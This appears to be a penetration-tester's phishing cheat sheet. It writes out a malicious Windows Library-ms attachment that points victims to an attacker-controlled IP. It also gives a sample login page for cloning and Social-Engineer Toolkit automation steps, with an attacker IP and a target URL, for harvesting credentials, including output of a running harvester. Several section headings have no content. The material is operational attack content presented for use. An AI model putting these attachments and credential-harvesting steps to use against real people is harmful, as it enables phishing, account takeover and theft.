Phising

Attachment

1. Malicious File

Create a malicious attachment (config.Library-ms) and include the attacker host's IP address within the <url> tags (line 15):

Create the attachment on a Windows host!

• Library-ms is a Windows-specific file format, and it must follow a specific XML structure with Windows metadata.

• If it is created it on Linux, even with the same contents, it might not be recognized or executed properly by Windows.

config.Library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://172.16.42.42</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

2. Shortcut

3. Transfer & Setup

4. Email

Site Clone

The below process can be often simplified by just sending the phishing email(s) and launching a nc listener!

Example HTML code for a login page which can be hosted on Apache2 for set to clone:

login.html

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Simple Login</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #f2f2f2;
      display: flex;
      height: 100vh;
      justify-content: center;
      align-items: center;
    }
    .login-container {
      background: white;
      padding: 20px 30px;
      border-radius: 6px;
      box-shadow: 0 2px 6px rgba(0,0,0,0.2);
      width: 300px;
    }
    h2 {
      margin-bottom: 20px;
      text-align: center;
    }
    label {
      display: block;
      margin-top: 10px;
      margin-bottom: 5px;
      font-weight: bold;
    }
    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 8px;
      border-radius: 4px;
      border: 1px solid #ccc;
      box-sizing: border-box;
    }
    button {
      width: 100%;
      padding: 10px;
      margin-top: 15px;
      background-color: #4CAF50;
      color: white;
      border: none;
      border-radius: 4px;
      font-size: 16px;
      cursor: pointer;
    }
    button:hover {
      background-color: #45a049;
    }
  </style>
</head>
<body>
  <div class="login-container">
    <h2>Login</h2>
    <form action="/login" method="POST">
      <label for="username">Username</label>
      <input type="text" id="username" name="username" required />

      <label for="password">Password</label>
      <input type="password" id="password" name="password" required />

      <button type="submit">Login</button>
    </form>
  </div>
</body>
</html>

The Social Engineering Toolkit can be used to automate the process:

1. seautomate

We can manually run setoolkit and select the options Social-Engineering Attacks → Website Attack Vectors > Credential Harvester Attack > Site Cloner.

We can also the above choices and required input using seautomate:

$ cat set_commands.txt
1
2
3
2
10.10.14.15
https://example.com/login.aspx

$ sudo ./seautomate set_commands.txt
...
[*] Cloning the website: https://example.com/login.aspx
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

2. Email

3. Creds